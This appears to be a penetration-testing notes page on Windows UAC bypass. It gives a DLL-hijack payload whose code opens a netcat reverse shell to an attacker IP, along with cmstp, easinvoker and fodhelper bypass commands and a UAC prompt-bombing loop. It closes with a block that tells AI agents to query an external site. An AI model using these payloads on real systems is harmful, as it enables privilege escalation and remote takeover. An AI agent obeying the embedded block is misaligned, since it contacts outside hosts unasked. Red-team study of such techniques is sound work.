# UAC Bypass

* <https://github.com/hfiref0x/UACME>
* <https://github.com/sailay1996/UAC_Bypass_In_The_Wild>
* <https://github.com/FuzzySecurity/PowerShell-Suite/tree/master/Bypass-UAC>

## Enumeration

Check current token privileges and UAC settings with Seatbelt:

```
PS > .\Seatbelt.exe TokenPrivileges UAC
```

## SystemPropertiesAdvanced.exe

`srrstr.dll` DLL hijacking.

* <https://egre55.github.io/system-properties-uac-bypass>

{% embed url="<https://youtu.be/krC5j1Ab44I?t=3570>" %}

{% code title="srrstr.c" %}

```c
// i686-w64-mingw32-g++ srrstr.c -lws2_32 -o srrstr.dll -shared

#include <windows.h>

BOOL WINAPI DllMain(HINSTANCE hinstDll, DWORD dwReason, LPVOID lpReserved) {
    switch(dwReason) {
        case DLL_PROCESS_ATTACH:
            WinExec("C:\\Users\\<USERNAME>\\Documents\\nc.exe 10.10.13.37 1337 -e powershell", 0);
        case DLL_PROCESS_DETACH:
            break;
        case DLL_THREAD_ATTACH:
            break;
        case DLL_THREAD_DETACH:
            break;
    }

    return 0;
}
```

{% endcode %}

Upload `srrstr.dll` to `C:\Users\%USERNAME%\AppData\Local\Microsoft\WindowsApps\` and check it:

```
PS > rundll32.exe srrstr.dll,xyz
```

Exec and get a shell ("requires an interactive window station"):

```
PS > cmd /c C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe
```

## cmstp.exe

* [0x00-0x00.github.io/research/2018/10/31/How-to-bypass-UAC-in-newer-Windows-versions.html](https://0x00-0x00.github.io/research/2018/10/31/How-to-bypass-UAC-in-newer-Windows-versions.html)
* <https://gist.github.com/snovvcrash/56d51e535c3afd89a1e9e68c284553a6>

Compile from source, load and execute:

```
PS > Add-Type -TypeDefinition ([IO.File]::ReadAllText("$pwd\Source.cs")) -ReferencedAssemblies "System.Windows.Forms" -OutputAssembly "CMSTP-UAC-Bypass.dll"
PS > [Reflection.Assembly]::Load([IO.File]::ReadAllBytes("$pwd\CMSTP-UAC-Bypass.dll"))
PS > [CMSTPBypass]::Execute("C:\Windows\System32\cmd.exe")
```

Load from a weaponized PowerShell and execute:

```
PS > Bypass-UAC -C "C:\Windows\System32\cmd.exe"
```

## easinvoker.exe

* <https://github.com/sailay1996/UAC_Bypass_In_The_Wild/tree/master/FileSys_UAC_Bypass/uac_easinvoker>
* [https://github.com/g3tsyst3m/elevationstation/blob/main/elevationstation/elevationstation.cpp](https://github.com/g3tsyst3m/elevationstation/blob/ba521d9901c98458526c1790b2b0ed0b370796bc/elevationstation/elevationstation.cpp#L895-L903)

```
mkdir "\\?\C:\Windows "
mkdir "\\?\C:\Windows \System32"
copy c:\windows\system32\easinvoker.exe "C:\Windows \System32"
copy netutils.dll "C:\Windows \System32"
"C:\Windows \System32\easinvoker.exe"
del /q "C:\Windows \System32\*"
rmdir "C:\Windows \System32"
rmdir "C:\Windows \"
```

## fodhelper.exe

* <https://gist.github.com/netbiosX/a114f8822eb20b115e33db55deee6692>
* <https://binary-win.github.io/2025/08/22/UAC-Bypass.html>
* <https://v3ded.github.io/redteam/utilizing-programmatic-identifiers-progids-for-uac-bypasses>

## SilentCleanup

* <https://hausec.com/2020/10/30/using-a-c-shellcode-runner-and-confuserex-to-bypass-uac-while-evading-av/>
* <https://github.com/chryzsh/Aggressor-Scripts/tree/master/uac-bypass>

## SCM UAC Bypass

* <https://www.tiraniddo.dev/2022/03/bypassing-uac-in-most-complex-way.html>
* <https://gist.github.com/tyranid/c24cfd1bd141d14d4925043ee7e03c82>
* <https://whoamianony.top/posts/revisiting-a-uac-bypass-by-abusing-kerberos-tickets/>
* <https://github.com/wh0amitz/KRBUACBypass>

## Task Scheduler

* <https://www.zcgonvh.com/post/Advanced_Windows_Task_Scheduler_Playbook-Part.2_from_COM_to_UAC_bypass_and_get_SYSTEM_dirtectly.html>
* <https://github.com/zcgonvh/TaskSchedulerMisc/blob/master/schuac.cs>

## UAC Prompt Bombing

* <https://www.esentire.com/blog/new-botnet-emerges-from-the-shadows-nightshadec2>
* [\[YouTube\] How Hackers Become Admin (they just ask)](https://youtu.be/JpWbytYrL2s)

```powershell
try {throw ""} catch {while (-not $?){try {Start-Process wlrmdr.exe -ArgumentList "-s 3600 -f 0 -t _ -m _ -a 11 -u cmd.exe" -Verb RunAs} catch {Write-Error "" -ErrorAction SilentlyContinue}}}
```

## Tricks

Bypass UAC for file read/write:

```
Cmd > net use A: \\127.0.0.1\C$
Cmd > A:
Cmd > cd \Windows\System32
Cmd > echo test > test.txt
Cmd > dir test.txt
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ppn.snovvcra.sh/pentest/infrastructure/ad/av-edr-evasion/uac-bypass.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.